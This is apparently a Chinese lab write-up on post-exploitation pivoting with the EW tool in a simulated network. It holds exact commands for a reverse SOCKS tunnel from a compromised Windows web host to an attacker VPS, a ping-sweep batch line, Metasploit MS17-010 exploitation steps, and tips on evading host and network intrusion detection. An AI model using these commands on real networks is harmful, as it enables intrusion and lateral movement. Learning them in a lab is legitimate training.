一、前言
前面一次网进行了内网渗透,这里做个人小结,也方便其他小伙伴学习EW。这里仅记录后渗透中与EW相关的部分已提前在tomcat中留下冰蝎马。
二、本文介绍
1.准备工作 2.EW是什么,可以做什么。 3.内网模拟(基础环境及网络拓扑) 4.EW代理实战 6.利用proxychains代理寻找MS17-010。
三、准备工作
1.模拟环境需要natapp.cn这类NAT穿透工具注册账号购买免费web映射套餐 2.EW内网穿透工具,https://github.com/idlefire/ew 3.一台Ubuntu VPS,端口开放10000-65535 4.若干台WINDOWS虚拟机在NAT网络下运行。
四、EW简介
EW是一款四年前开发好的NAT穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透代理服务,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,帮助内网渗透直达网络深处。工具包中提供了多种可执行文件,以适用不同的操作系统,Linux、Windows、MacOS、Arm-Linux 均被包括其内。
EW共有 6 种命令格式(ssocksd正向、rcsocks反弹、rssocks反弹、lcx_slave级联 、lcx_listen级联 、lcx_tran级联 )。其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理,其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。这里篇幅有限,仅介绍危害最大的rssocks。
同类工具还有socat,就实战来看,EW操作较简单,SOCAT有时会发生段错误,而EW则比较稳定。
防守方如需查杀规则查看 https://github.com/rootkiter/Binary-files 项目。
五、内网模拟
[backcolor=white] Kali Linux(Attacker 内网 172.16.33.129)
Ubuntu 16.04.3(Attacker 公网 120.53.123.X)
Windows 7(肉鸡 WEB服务器 172.2.40.129)
Windows 7 SP1(肉鸡内网其他机器 172.2.40.X)[/backcolor]
网络拓扑:Kali Linux是攻击者,Ubuntu是公网上的一台VPS,Windows 7是目标机器无外网IP8080端口通过NAT穿透工具映射到外网提供WEB服务。
六、EW代理实战
数据流向: 黑客KALI SOCKS v5 <-> VPS 10801 <-> VPS 10241 <-> 肉鸡 rssocks
操作在 公网IP主机 和 WEB肉机上进行目的是通过反弹方式创建socks代理。
第一步,在VPS上将Github下回的 EW 项目解压并执行:
./ew_for_linux64 -s rcsocks -l 10801 -e 10241
这句话的意思是,在 120.53.123.X VPS主机添加转换隧道,其中10801端口供黑客使用,10241 端口供肉鸡通道连接,黑客连接10801,本质是反连VPS的10241端口。
第二步,在WEB主机(172.2.40.129)上执行:
ew_for_Win.exe -s rssocks -d 120.53.123.X -e 10241
这句话的意思是,在WEB肉鸡上开启socks5代理服务,具体端口依据VPS端设定,这里的10241仅与VPS通信使用。上传ew到选定的目录。
肉鸡网络环境
肉鸡内网其他机器
工具使用第三步,在KALI上:vim /etc/proxychains.conf
socks5 120.53.123.X 10241
这里用SOCKS5,因为是WIN的主机,还有一个选择--弹到CS,CS代理为SOCKS4。
注意验证SOCKS是否打通
proxychains nmap -sT hosts -p port
七、内网探测
proxy nmap targetIP
慎用扫描,流量动静大、速度慢、不稳定、时间长、容易断 。
NetBIOS、ICMP均可以探测存活主机前者仅探测WIN后者遇到禁ping摸瞎。
还有ARP探测特征比较明显。三者权衡,因此进入陌生环境,首选ICMP。
如果是Linux用bash脚本,如果是Win用bat脚本或上PS如Empire的arpscan模块、Nishang的Invoke-ARPScan.ps1。
cmd命令可保存成bat后执行:for /l %%p in (1,1,254) do ping 172.2.40.%%p -n 1 -w 5 |find "TTL" >./ipcheck.log
也可先执行,arp -a看缓存结果。
注意Socks协议只能下到网络层,ICMP属于链路层无法代理。
因此proxychains ping命令不能正常工作。
验证内网WIN主机是否开启防火墙,
八、MSF漏洞验证
proxychains msfconsole
search 17_010
use 1
set rhost 172.2.40.128
exploit
九、总结
内网中有许多监控设备,有HIDS和NIDS, 其中规避HIDS需对工具免杀,规避NIDS需慎用扫描,避免踩雷。学习上,搭靶场多积累经验,了解安全设备检测原理避免被针对。